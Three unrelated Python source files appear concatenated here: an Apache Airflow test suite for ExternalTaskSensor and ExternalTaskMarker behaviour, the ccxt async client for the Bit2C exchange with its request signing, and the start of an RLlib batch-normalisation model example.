bash_command_code = """
{% set s=logical_date.time().second %}
echo "second is {{ s }}"
if [[ $(( {{ s }} % 60 )) == 1 ]]
then
exit 1
fi
exit 0
"""
dag_external_id = TEST_DAG_ID + '_external'
dag_external = DAG(dag_external_id, default_args=self.args, schedule_interval=timedelta(seconds=1))
task_external_with_failure = BashOperator(
task_id="task_external_with_failure", bash_command=bash_command_code, retries=0, dag=dag_external
)
task_external_without_failure = DummyOperator(
task_id="task_external_without_failure", retries=0, dag=dag_external
)
task_external_without_failure.run(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE + timedelta(seconds=1), ignore_ti_state=True
)
session = settings.Session()
TI = TaskInstance
try:
task_external_with_failure.run(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE + timedelta(seconds=1), ignore_ti_state=True
)
            # The test_with_failure task is expected to fail
# once per minute (the run on the first second of
# each minute).
except Exception as e:
failed_tis = (
session.query(TI)
.filter(
TI.dag_id == dag_external_id,
TI.state == State.FAILED,
TI.execution_date == DEFAULT_DATE + timedelta(seconds=1),
)
.all()
)
if len(failed_tis) == 1 and failed_tis[0].task_id == 'task_external_with_failure':
pass
else:
raise e
dag_id = TEST_DAG_ID
dag = DAG(dag_id, default_args=self.args, schedule_interval=timedelta(minutes=1))
task_without_failure = ExternalTaskSensor(
task_id='task_without_failure',
external_dag_id=dag_external_id,
external_task_id='task_external_without_failure',
execution_date_fn=lambda dt: [dt + timedelta(seconds=i) for i in range(2)],
allowed_states=['success'],
retries=0,
timeout=1,
poke_interval=1,
dag=dag,
)
task_with_failure = ExternalTaskSensor(
task_id='task_with_failure',
external_dag_id=dag_external_id,
external_task_id='task_external_with_failure',
execution_date_fn=lambda dt: [dt + timedelta(seconds=i) for i in range(2)],
allowed_states=['success'],
retries=0,
timeout=1,
poke_interval=1,
dag=dag,
)
task_without_failure.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
with pytest.raises(AirflowSensorTimeout):
task_with_failure.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_delta(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_delta=timedelta(0),
allowed_states=['success'],
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_fn(self):
self.test_time_sensor()
# check that the execution_fn works
op1 = ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta_1',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_date_fn=lambda dt: dt + timedelta(0),
allowed_states=['success'],
dag=self.dag,
)
op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
# double check that the execution is being called by failing the test
op2 = ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta_2',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_date_fn=lambda dt: dt + timedelta(days=1),
allowed_states=['success'],
timeout=1,
poke_interval=1,
dag=self.dag,
)
with pytest.raises(exceptions.AirflowSensorTimeout):
op2.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_fn_multiple_args(self):
"""Check this task sensor passes multiple args with full context. If no failure, means clean run."""
self.test_time_sensor()
def my_func(dt, context):
assert context['logical_date'] == dt
return dt + timedelta(0)
op1 = ExternalTaskSensor(
task_id='test_external_task_sensor_multiple_arg_fn',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_date_fn=my_func,
allowed_states=['success'],
dag=self.dag,
)
op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_fn_kwargs(self):
"""Check this task sensor passes multiple args with full context. If no failure, means clean run."""
self.test_time_sensor()
def my_func(dt, ds_nodash, tomorrow_ds_nodash):
assert ds_nodash == dt.strftime("%Y%m%d")
assert tomorrow_ds_nodash == (dt + timedelta(days=1)).strftime("%Y%m%d")
return dt + timedelta(0)
op1 = ExternalTaskSensor(
task_id='test_external_task_sensor_fn_kwargs',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_date_fn=my_func,
allowed_states=['success'],
dag=self.dag,
)
op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_error_delta_and_fn(self):
self.test_time_sensor()
# Test that providing execution_delta and a function raises an error
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
execution_delta=timedelta(0),
execution_date_fn=lambda dt: dt,
allowed_states=['success'],
dag=self.dag,
)
def test_external_task_sensor_error_task_id_and_task_ids(self):
self.test_time_sensor()
        # Test that providing both external_task_id and external_task_ids raises an error
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_task_id_and_task_ids',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
external_task_ids=[TEST_TASK_ID],
allowed_states=['success'],
dag=self.dag,
)
def test_catch_duplicate_task_ids(self):
self.test_time_sensor()
# Test By passing same task_id multiple times
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_duplicate_task_ids',
external_dag_id=TEST_DAG_ID,
external_task_ids=[TEST_TASK_ID, TEST_TASK_ID],
allowed_states=['success'],
dag=self.dag,
)
def test_catch_invalid_allowed_states(self):
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_check_1',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
allowed_states=['invalid_state'],
dag=self.dag,
)
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_check_2',
external_dag_id=TEST_DAG_ID,
external_task_id=None,
allowed_states=['invalid_state'],
dag=self.dag,
)
def test_external_task_sensor_waits_for_task_check_existence(self):
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id="example_bash_operator",
external_task_id="non-existing-task",
check_existence=True,
dag=self.dag,
)
with pytest.raises(AirflowException):
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_waits_for_dag_check_existence(self):
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id="non-existing-dag",
external_task_id=None,
check_existence=True,
dag=self.dag,
)
with pytest.raises(AirflowException):
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_templated(dag_maker):
with dag_maker():
ExternalTaskSensor(
task_id='templated_task',
external_dag_id='dag_{{ ds }}',
external_task_id='task_{{ ds }}',
)
dagrun = dag_maker.create_dagrun(run_type=DagRunType.SCHEDULED, execution_date=DEFAULT_DATE)
(instance,) = dagrun.task_instances
instance.render_templates()
assert instance.task.external_dag_id == f"dag_{DEFAULT_DATE.date()}"
assert instance.task.external_task_id == f"task_{DEFAULT_DATE.date()}"
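# Hedged sketch (not part of the original test module): the minimal
# producer/consumer wiring these tests exercise. The ExternalTaskMarker in the
# parent DAG points at the ExternalTaskSensor in the child DAG, and the sensor
# points back at the marker's task. DAG and task ids are illustrative only.
def _example_external_dependency():
    parent = DAG("example_parent", start_date=DEFAULT_DATE, schedule_interval=None)
    child = DAG("example_child", start_date=DEFAULT_DATE, schedule_interval=None)
    notify = ExternalTaskMarker(
        task_id="notify_child",
        external_dag_id="example_child",
        external_task_id="wait_for_parent",
        dag=parent,
    )
    wait = ExternalTaskSensor(
        task_id="wait_for_parent",
        external_dag_id="example_parent",
        external_task_id="notify_child",
        dag=child,
    )
    return notify, wait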
class TestExternalTaskMarker(unittest.TestCase):
def test_serialized_fields(self):
assert {"recursion_depth"}.issubset(ExternalTaskMarker.get_serialized_fields())
def test_serialized_external_task_marker(self):
dag = DAG('test_serialized_external_task_marker', start_date=DEFAULT_DATE)
task = ExternalTaskMarker(
task_id="parent_task",
external_dag_id="external_task_marker_child",
external_task_id="child_task1",
dag=dag,
)
serialized_op = SerializedBaseOperator.serialize_operator(task)
deserialized_op = SerializedBaseOperator.deserialize_operator(serialized_op)
assert deserialized_op.task_type == 'ExternalTaskMarker'
assert getattr(deserialized_op, 'external_dag_id') == 'external_task_marker_child'
assert getattr(deserialized_op, 'external_task_id') == 'child_task1'
@pytest.fixture
def dag_bag_ext():
"""
Create a DagBag with DAGs looking like this. The dotted lines represent external dependencies
set up using ExternalTaskMarker and ExternalTaskSensor.
dag_0: task_a_0 >> task_b_0
|
|
dag_1: ---> task_a_1 >> task_b_1
|
|
dag_2: ---> task_a_2 >> task_b_2
|
|
dag_3: ---> task_a_3 >> task_b_3
"""
clear_db_runs()
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
dag_0 = DAG("dag_0", start_date=DEFAULT_DATE, schedule_interval=None)
task_a_0 = DummyOperator(task_id="task_a_0", dag=dag_0)
task_b_0 = ExternalTaskMarker(
task_id="task_b_0", external_dag_id="dag_1", external_task_id="task_a_1", recursion_depth=3, dag=dag_0
)
task_a_0 >> task_b_0
dag_1 = DAG("dag_1", start_date=DEFAULT_DATE, schedule_interval=None)
task_a_1 = ExternalTaskSensor(
task_id="task_a_1", external_dag_id=dag_0.dag_id, external_task_id=task_b_0.task_id, dag=dag_1
)
task_b_1 = ExternalTaskMarker(
task_id="task_b_1", external_dag_id="dag_2", external_task_id="task_a_2", recursion_depth=2, dag=dag_1
)
task_a_1 >> task_b_1
dag_2 = DAG("dag_2", start_date=DEFAULT_DATE, schedule_interval=None)
task_a_2 = ExternalTaskSensor(
task_id="task_a_2", external_dag_id=dag_1.dag_id, external_task_id=task_b_1.task_id, dag=dag_2
)
task_b_2 = ExternalTaskMarker(
task_id="task_b_2", external_dag_id="dag_3", external_task_id="task_a_3", recursion_depth=1, dag=dag_2
)
task_a_2 >> task_b_2
dag_3 = DAG("dag_3", start_date=DEFAULT_DATE, schedule_interval=None)
task_a_3 = ExternalTaskSensor(
task_id="task_a_3", external_dag_id=dag_2.dag_id, external_task_id=task_b_2.task_id, dag=dag_3
)
task_b_3 = DummyOperator(task_id="task_b_3", dag=dag_3)
task_a_3 >> task_b_3
for dag in [dag_0, dag_1, dag_2, dag_3]:
dag_bag.bag_dag(dag=dag, root_dag=dag)
yield dag_bag
clear_db_runs()
@pytest.fixture
def dag_bag_parent_child():
"""
Create a DagBag with two DAGs looking like this. task_1 of child_dag_1 on day 1 depends on
task_0 of parent_dag_0 on day 1. Therefore, when task_0 of parent_dag_0 on day 1 and day 2
are cleared, parent_dag_0 DagRuns need to be set to running on both days, but child_dag_1
only needs to be set to running on day 1.
day 1 day 2
parent_dag_0 task_0 task_0
|
|
v
child_dag_1 task_1 task_1
"""
clear_db_runs()
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
day_1 = DEFAULT_DATE
with DAG("parent_dag_0", start_date=day_1, schedule_interval=None) as dag_0:
task_0 = ExternalTaskMarker(
task_id="task_0",
external_dag_id="child_dag_1",
external_task_id="task_1",
execution_date=day_1.isoformat(),
recursion_depth=3,
)
with DAG("child_dag_1", start_date=day_1, schedule_interval=None) as dag_1:
ExternalTaskSensor(
task_id="task_1",
external_dag_id=dag_0.dag_id,
external_task_id=task_0.task_id,
execution_date_fn=lambda logical_date: day_1 if logical_date == day_1 else [],
mode='reschedule',
)
for dag in [dag_0, dag_1]:
dag_bag.bag_dag(dag=dag, root_dag=dag)
yield dag_bag
clear_db_runs()
@provide_session
def run_tasks(dag_bag, execution_date=DEFAULT_DATE, session=None):
"""
Run all tasks in the DAGs in the given dag_bag. Return the TaskInstance objects as a dict
keyed by task_id.
"""
tis = {}
for dag in dag_bag.dags.values():
dagrun = dag.create_dagrun(
state=State.RUNNING,
execution_date=execution_date,
start_date=execution_date,
run_type=DagRunType.MANUAL,
session=session,
)
# we use sorting by task_id here because for the test DAG structure of ours
# this is equivalent to topological sort. It would not work in general case
# but it works for our case because we specifically constructed test DAGS
# in the way that those two sort methods are equivalent
tasks = sorted((ti for ti in dagrun.task_instances), key=lambda ti: ti.task_id)
for ti in tasks:
ti.refresh_from_task(dag.get_task(ti.task_id))
tis[ti.task_id] = ti
ti.run(session=session)
session.flush()
session.merge(ti)
assert_ti_state_equal(ti, State.SUCCESS)
return tis
def assert_ti_state_equal(task_instance, state):
"""
Assert state of task_instances equals the given state.
"""
task_instance.refresh_from_db()
assert task_instance.state == state
@provide_session
def clear_tasks(
dag_bag,
dag,
task,
session,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
dry_run=False,
):
"""
Clear the task and its downstream tasks recursively for the dag in the given dagbag.
"""
partial: DAG = dag.partial_subset(task_ids_or_regex=[task.task_id], include_downstream=True)
return partial.clear(
start_date=start_date,
end_date=end_date,
dag_bag=dag_bag,
dry_run=dry_run,
session=session,
)
def test_external_task_marker_transitive(dag_bag_ext):
"""
Test clearing tasks across DAGs.
"""
tis = run_tasks(dag_bag_ext)
dag_0 = dag_bag_ext.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
clear_tasks(dag_bag_ext, dag_0, task_a_0)
ti_a_0 = tis["task_a_0"]
ti_b_3 = tis["task_b_3"]
assert_ti_state_equal(ti_a_0, State.NONE)
assert_ti_state_equal(ti_b_3, State.NONE)
@provide_session
def test_external_task_marker_clear_activate(dag_bag_parent_child, session):
"""
Test clearing tasks across DAGs and make sure the right DagRuns are activated.
"""
dag_bag = dag_bag_parent_child
day_1 = DEFAULT_DATE
day_2 = DEFAULT_DATE + timedelta(days=1)
run_tasks(dag_bag, execution_date=day_1)
run_tasks(dag_bag, execution_date=day_2)
# Assert that dagruns of all the affected dags are set to SUCCESS before tasks are cleared.
for dag in dag_bag.dags.values():
for execution_date in [day_1, day_2]:
dagrun = dag.get_dagrun(execution_date=execution_date, session=session)
dagrun.set_state(State.SUCCESS)
session.flush()
dag_0 = dag_bag.get_dag("parent_dag_0")
task_0 = dag_0.get_task("task_0")
clear_tasks(dag_bag, dag_0, task_0, start_date=day_1, end_date=day_2, session=session)
# Assert that dagruns of all the affected dags are set to QUEUED after tasks are cleared.
# Unaffected dagruns should be left as SUCCESS.
dagrun_0_1 = dag_bag.get_dag('parent_dag_0').get_dagrun(execution_date=day_1, session=session)
dagrun_0_2 = dag_bag.get_dag('parent_dag_0').get_dagrun(execution_date=day_2, session=session)
dagrun_1_1 = dag_bag.get_dag('child_dag_1').get_dagrun(execution_date=day_1, session=session)
dagrun_1_2 = dag_bag.get_dag('child_dag_1').get_dagrun(execution_date=day_2, session=session)
assert dagrun_0_1.state == State.QUEUED
assert dagrun_0_2.state == State.QUEUED
assert dagrun_1_1.state == State.QUEUED
assert dagrun_1_2.state == State.SUCCESS
def test_external_task_marker_future(dag_bag_ext):
"""
Test clearing tasks with no end_date. This is the case when users clear tasks with
Future, Downstream and Recursive selected.
"""
date_0 = DEFAULT_DATE
date_1 = DEFAULT_DATE + timedelta(days=1)
tis_date_0 = run_tasks(dag_bag_ext, execution_date=date_0)
tis_date_1 = run_tasks(dag_bag_ext, execution_date=date_1)
dag_0 = dag_bag_ext.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
# This should clear all tasks on dag_0 to dag_3 on both date_0 and date_1
clear_tasks(dag_bag_ext, dag_0, task_a_0, end_date=None)
ti_a_0_date_0 = tis_date_0["task_a_0"]
ti_b_3_date_0 = tis_date_0["task_b_3"]
ti_b_3_date_1 = tis_date_1["task_b_3"]
assert_ti_state_equal(ti_a_0_date_0, State.NONE)
assert_ti_state_equal(ti_b_3_date_0, State.NONE)
assert_ti_state_equal(ti_b_3_date_1, State.NONE)
def test_external_task_marker_exception(dag_bag_ext):
"""
Clearing across multiple DAGs should raise AirflowException if more levels are being cleared
than allowed by the recursion_depth of the first ExternalTaskMarker being cleared.
"""
run_tasks(dag_bag_ext)
dag_0 = dag_bag_ext.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
task_b_0 = dag_0.get_task("task_b_0")
task_b_0.recursion_depth = 2
with pytest.raises(AirflowException, match="Maximum recursion depth 2"):
clear_tasks(dag_bag_ext, dag_0, task_a_0)
@pytest.fixture
def dag_bag_cyclic():
"""
Create a DagBag with DAGs having cyclic dependencies set up by ExternalTaskMarker and
ExternalTaskSensor.
dag_0: task_a_0 >> task_b_0
^ |
| |
dag_1: | ---> task_a_1 >> task_b_1
| ^
| |
dag_n: | ---> task_a_n >> task_b_n
| |
-----------------------------------------------------
"""
def _factory(depth: int) -> DagBag:
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
dags = []
with DAG("dag_0", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
dags.append(dag)
task_a_0 = DummyOperator(task_id="task_a_0")
task_b_0 = ExternalTaskMarker(
task_id="task_b_0", external_dag_id="dag_1", external_task_id="task_a_1", recursion_depth=3
)
task_a_0 >> task_b_0
for n in range(1, depth):
with DAG(f"dag_{n}", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
dags.append(dag)
task_a = ExternalTaskSensor(
task_id=f"task_a_{n}",
external_dag_id=f"dag_{n-1}",
external_task_id=f"task_b_{n-1}",
)
task_b = ExternalTaskMarker(
task_id=f"task_b_{n}",
external_dag_id=f"dag_{n+1}",
external_task_id=f"task_a_{n+1}",
recursion_depth=3,
)
task_a >> task_b
# Create the last dag which loops back
with DAG(f"dag_{depth}", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
dags.append(dag)
task_a = ExternalTaskSensor(
task_id=f"task_a_{depth}",
external_dag_id=f"dag_{depth-1}",
external_task_id=f"task_b_{depth-1}",
)
task_b = ExternalTaskMarker(
task_id=f"task_b_{depth}",
external_dag_id="dag_0",
external_task_id="task_a_0",
recursion_depth=2,
)
task_a >> task_b
for dag in dags:
dag_bag.bag_dag(dag=dag, root_dag=dag)
return dag_bag
return _factory
def test_external_task_marker_cyclic_deep(dag_bag_cyclic):
"""
Tests clearing across multiple DAGs that have cyclic dependencies. AirflowException should be
raised.
"""
dag_bag = dag_bag_cyclic(10)
run_tasks(dag_bag)
dag_0 = dag_bag.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
with pytest.raises(AirflowException, match="Maximum recursion depth 3"):
clear_tasks(dag_bag, dag_0, task_a_0)
def test_external_task_marker_cyclic_shallow(dag_bag_cyclic):
"""
Tests clearing across multiple DAGs that have cyclic dependencies shallower
than recursion_depth
"""
dag_bag = dag_bag_cyclic(2)
run_tasks(dag_bag)
dag_0 = dag_bag.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
tis = clear_tasks(dag_bag, dag_0, task_a_0, dry_run=True)
assert [
("dag_0", "task_a_0"),
("dag_0", "task_b_0"),
("dag_1", "task_a_1"),
("dag_1", "task_b_1"),
("dag_2", "task_a_2"),
("dag_2", "task_b_2"),
] == sorted((ti.dag_id, ti.task_id) for ti in tis)
@pytest.fixture
def dag_bag_multiple():
"""
Create a DagBag containing two DAGs, linked by multiple ExternalTaskMarker.
"""
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
daily_dag = DAG("daily_dag", start_date=DEFAULT_DATE, schedule_interval="@daily")
agg_dag = DAG("agg_dag", start_date=DEFAULT_DATE, schedule_interval="@daily")
dag_bag.bag_dag(dag=daily_dag, root_dag=daily_dag)
dag_bag.bag_dag(dag=agg_dag, root_dag=agg_dag)
daily_task = DummyOperator(task_id="daily_tas", dag=daily_dag)
start = DummyOperator(task_id="start", dag=agg_dag)
for i in range(25):
task = ExternalTaskMarker(
task_id=f"{daily_task.task_id}_{i}",
external_dag_id=daily_dag.dag_id,
external_task_id=daily_task.task_id,
execution_date="{{ macros.ds_add(ds, -1 * %s) }}" % i,
dag=agg_dag,
)
start >> task
yield dag_bag
@pytest.mark.quarantined
@pytest.mark.backend("postgres", "mysql")
def test_clear_multiple_external_task_marker(dag_bag_multiple):
"""
Test clearing a dag that has multiple ExternalTaskMarker.
sqlite3 parser stack size is 100 lexical items by default so this puts a hard limit on
the level of nesting in the sql. This test is intentionally skipped in sqlite.
"""
agg_dag = dag_bag_multiple.get_dag("agg_dag")
for delta in range(len(agg_dag.tasks)):
execution_date = DEFAULT_DATE + timedelta(days=delta)
run_tasks(dag_bag_multiple, execution_date=execution_date)
# There used to be some slowness caused by calling count() inside DAG.clear().
# That has since been fixed. It should take no more than a few seconds to call
# dag.clear() here.
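    # For reference, the expected count of 51 is the 26 agg_dag task instances on this
    # execution_date (start + 25 markers) plus the 25 daily_dag task instances targeted
    # by the ExternalTaskMarkers through their execution_date offsets.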
assert agg_dag.clear(start_date=execution_date, end_date=execution_date, dag_bag=dag_bag_multiple) == 51
@pytest.fixture
def dag_bag_head_tail():
"""
Create a DagBag containing one DAG, with task "head" depending on task "tail" of the
previous execution_date.
20200501 20200502 20200510
+------+ +------+ +------+
| head | -->head | --> -->head |
| | | / | | | / / | | |
| v | / | v | / / | v |
| body | / | body | / ... / | body |
| | |/ | | |/ / | | |
| v / | v / / | v |
| tail/| | tail/| / | tail |
+------+ +------+ +------+
"""
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
with DAG("head_tail", start_date=DEFAULT_DATE, schedule_interval="@daily") as dag:
head = ExternalTaskSensor(
task_id='head',
external_dag_id=dag.dag_id,
external_task_id="tail",
execution_delta=timedelta(days=1),
mode="reschedule",
)
body = DummyOperator(task_id="body")
tail = ExternalTaskMarker(
task_id="tail",
external_dag_id=dag.dag_id,
external_task_id=head.task_id,
execution_date="{{ macros.ds_add(ds, 1) }}",
)
head >> body >> tail
dag_bag.bag_dag(dag=dag, root_dag=dag)
return dag_bag
@provide_session
def test_clear_overlapping_external_task_marker(dag_bag_head_tail, session):
dag: DAG = dag_bag_head_tail.get_dag('head_tail')
# "Run" 10 times.
for delta in range(0, 10):
execution_date = DEFAULT_DATE + timedelta(days=delta)
dagrun = DagRun(
dag_id=dag.dag_id,
state=DagRunState.SUCCESS,
execution_date=execution_date,
run_type=DagRunType.MANUAL,
run_id=f"test_{delta}",
)
session.add(dagrun)
for task in dag.tasks:
ti = TaskInstance(task=task)
dagrun.task_instances.append(ti)
ti.state = TaskInstanceState.SUCCESS
session.flush()
# The next two lines are doing the same thing. Clearing the first "head" with "Future"
# selected is the same as not selecting "Future". They should take similar amount of
# time too because dag.clear() uses visited_external_tis to keep track of visited ExternalTaskMarker.
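    # The expected count of 30 is simply 10 dag runs x 3 tasks ("head", "body", "tail").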
assert dag.clear(start_date=DEFAULT_DATE, dag_bag=dag_bag_head_tail, session=session) == 30
assert (
dag.clear(
start_date=DEFAULT_DATE,
end_date=execution_date,
dag_bag=dag_bag_head_tail,
session=session,
)
== 30
)
|
mistercrunch/airflow
|
tests/sensors/test_external_task_sensor.py
|
Python
|
apache-2.0
| 35,537
| 0.002561
|
# -*- coding: utf-8 -*-
from ccxt.async.base.exchange import Exchange
import hashlib
class bit2c (Exchange):
def describe(self):
return self.deep_extend(super(bit2c, self).describe(), {
'id': 'bit2c',
'name': 'Bit2C',
'countries': 'IL', # Israel
'rateLimit': 3000,
'hasCORS': False,
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/27766119-3593220e-5ece-11e7-8b3a-5a041f6bcc3f.jpg',
'api': 'https://www.bit2c.co.il',
'www': 'https://www.bit2c.co.il',
'doc': [
'https://www.bit2c.co.il/home/api',
'https://github.com/OferE/bit2c',
],
},
'api': {
'public': {
'get': [
'Exchanges/{pair}/Ticker',
'Exchanges/{pair}/orderbook',
'Exchanges/{pair}/trades',
],
},
'private': {
'post': [
'Account/Balance',
'Account/Balance/v2',
'Merchant/CreateCheckout',
'Order/AccountHistory',
'Order/AddCoinFundsRequest',
'Order/AddFund',
'Order/AddOrder',
'Order/AddOrderMarketPriceBuy',
'Order/AddOrderMarketPriceSell',
'Order/CancelOrder',
'Order/MyOrders',
'Payment/GetMyId',
'Payment/Send',
],
},
},
'markets': {
'BTC/NIS': {'id': 'BtcNis', 'symbol': 'BTC/NIS', 'base': 'BTC', 'quote': 'NIS'},
'BCH/NIS': {'id': 'BchNis', 'symbol': 'BCH/NIS', 'base': 'BCH', 'quote': 'NIS'},
'LTC/NIS': {'id': 'LtcNis', 'symbol': 'LTC/NIS', 'base': 'LTC', 'quote': 'NIS'},
'BTG/NIS': {'id': 'BtgNis', 'symbol': 'BTG/NIS', 'base': 'BTG', 'quote': 'NIS'},
},
'fees': {
'trading': {
'maker': 0.5 / 100,
'taker': 0.5 / 100,
},
},
})
async def fetch_balance(self, params={}):
balance = await self.privatePostAccountBalanceV2()
result = {'info': balance}
currencies = list(self.currencies.keys())
for i in range(0, len(currencies)):
currency = currencies[i]
account = self.account()
if currency in balance:
available = 'AVAILABLE_' + currency
account['free'] = balance[available]
account['total'] = balance[currency]
account['used'] = account['total'] - account['free']
result[currency] = account
return self.parse_balance(result)
async def fetch_order_book(self, symbol, params={}):
orderbook = await self.publicGetExchangesPairOrderbook(self.extend({
'pair': self.market_id(symbol),
}, params))
return self.parse_order_book(orderbook)
async def fetch_ticker(self, symbol, params={}):
ticker = await self.publicGetExchangesPairTicker(self.extend({
'pair': self.market_id(symbol),
}, params))
timestamp = self.milliseconds()
averagePrice = float(ticker['av'])
baseVolume = float(ticker['a'])
quoteVolume = baseVolume * averagePrice
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': float(ticker['h']),
'ask': float(ticker['l']),
'vwap': None,
'open': None,
'close': None,
'first': None,
'last': float(ticker['ll']),
'change': None,
'percentage': None,
'average': averagePrice,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}
def parse_trade(self, trade, market=None):
timestamp = int(trade['date']) * 1000
symbol = None
if market:
symbol = market['symbol']
return {
'id': str(trade['tid']),
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'order': None,
'type': None,
'side': None,
'price': trade['price'],
'amount': trade['amount'],
}
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
market = self.market(symbol)
response = await self.publicGetExchangesPairTrades(self.extend({
'pair': market['id'],
}, params))
return self.parse_trades(response, market, since, limit)
async def create_order(self, symbol, type, side, amount, price=None, params={}):
method = 'privatePostOrderAddOrder'
order = {
'Amount': amount,
'Pair': self.market_id(symbol),
}
if type == 'market':
method += 'MarketPrice' + self.capitalize(side)
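            # e.g. a market buy resolves to privatePostOrderAddOrderMarketPriceBuy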
else:
order['Price'] = price
order['Total'] = amount * price
order['IsBid'] = (side == 'buy')
result = await getattr(self, method)(self.extend(order, params))
return {
'info': result,
'id': result['NewOrder']['id'],
}
async def cancel_order(self, id, symbol=None, params={}):
return await self.privatePostOrderCancelOrder({'id': id})
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + self.implode_params(path, params)
if api == 'public':
url += '.json'
else:
self.check_required_credentials()
nonce = self.nonce()
query = self.extend({'nonce': nonce}, params)
body = self.urlencode(query)
signature = self.hmac(self.encode(body), self.encode(self.secret), hashlib.sha512, 'base64')
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'key': self.apiKey,
'sign': self.decode(signature),
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
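# Illustrative sketch (not part of the exchange class above): the private-endpoint
# signing scheme that sign() implements, reproduced with only the standard library.
# The secret, nonce and parameter values below are made-up placeholders.
import base64
import hashlib
import hmac
from urllib.parse import urlencode

def _bit2c_signature_sketch(params, secret, nonce):
    # the nonce is merged into the urlencoded form body, exactly as sign() does
    body = urlencode(dict(params, nonce=nonce))
    digest = hmac.new(secret.encode(), body.encode(), hashlib.sha512).digest()
    # the base64-encoded digest is what ends up in the 'sign' request header
    return body, base64.b64encode(digest).decode()

if __name__ == '__main__':
    print(_bit2c_signature_sketch({'Amount': 1, 'Pair': 'BtcNis'}, 'placeholder-secret', 1))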
|
tritoanst/ccxt
|
python/ccxt/async/bit2c.py
|
Python
|
mit
| 6,650
| 0.001353
|
import numpy as np
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.tf.misc import normc_initializer
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.torch.misc import SlimFC, normc_initializer as \
torch_normc_initializer
from ray.rllib.models.torch.torch_modelv2 import TorchModelV2
from ray.rllib.utils.annotations import override
from ray.rllib.utils.framework import try_import_tf, try_import_torch
tf1, tf, tfv = try_import_tf()
torch, nn = try_import_torch()
class BatchNormModel(TFModelV2):
"""Example of a TFModelV2 that is built w/o using tf.keras.
NOTE: This example does not work when using a keras-based TFModelV2 due
to a bug in keras related to missing values for input placeholders, even
though these input values have been provided in a forward pass through the
actual keras Model.
All Model logic (layers) is defined in the `forward` method (incl.
the batch_normalization layers). Also, all variables are registered
(only once) at the end of `forward`, so an optimizer knows which tensors
to train on. A standard `value_function` override is used.
"""
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
super().__init__(obs_space, action_space, num_outputs, model_config,
name)
# Have we registered our vars yet (see `forward`)?
self._registered = False
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
last_layer = input_dict["obs"]
hiddens = [256, 256]
with tf1.variable_scope("model", reuse=tf1.AUTO_REUSE):
for i, size in enumerate(hiddens):
last_layer = tf1.layers.dense(
last_layer,
size,
kernel_initializer=normc_initializer(1.0),
activation=tf.nn.tanh,
name="fc{}".format(i))
# Add a batch norm layer
last_layer = tf1.layers.batch_normalization(
last_layer,
training=input_dict["is_training"],
name="bn_{}".format(i))
output = tf1.layers.dense(
last_layer,
self.num_outputs,
kernel_initializer=normc_initializer(0.01),
activation=None,
